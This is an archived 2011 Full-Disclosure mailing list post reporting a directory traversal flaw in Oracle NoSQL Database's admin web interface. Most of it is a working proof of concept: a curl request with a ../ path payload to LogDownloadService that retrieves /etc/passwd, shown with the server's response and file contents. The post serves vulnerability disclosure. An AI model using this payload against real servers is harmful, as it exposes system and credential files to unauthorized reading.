| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAAyDpL84dSivTo1wPVoq9h0HzeMU4t8iywrFk5Q+1TfQ7zN6gw@mail.gmail.com> Date: Sat, 5 Nov 2011 18:58:20 +0100 From: Buherátor <buherator@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: Oracle NoSQL Directory Traversal Hi List, I don't know if this worth anything, because the manual says: "Oracle NoSQL Database is intended to be installed in a secure location where physical and network access to the store is restricted to trusted users. For this reason, at this time Oracle NoSQL Database's security model is designed to prevent accidental access to the data. It is not designed to prevent malicious access or denial-of-service attacks." Anyway, here is the deal: +++ $ curl -v http://127.0.0.1:5001/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd * About to connect() to 127.0.0.1 port 5001 (#0) * Trying 127.0.0.1... connected * Connected to 127.0.0.1 (127.0.0.1) port 5001 (#0) > GET /kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 > User-Agent: curl/7.21.3 (i686-pc-linux-gnu) libcurl/7.21.3 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.18 > Host: 127.0.0.1:5001 > Accept: */* > < HTTP/1.1 200 OK < Content-Type: application/octet-stream < Content-Length: 1668 < Content-Disposition: attachment; filename="../../../../../../../../../../../../../../../etc/passwd" < Server: Jetty(7.4.0.v20110414) < root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh [...] +++ Software: Oracle NoSQL Database 11gR2.1.1.100 Regards, Buherator _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists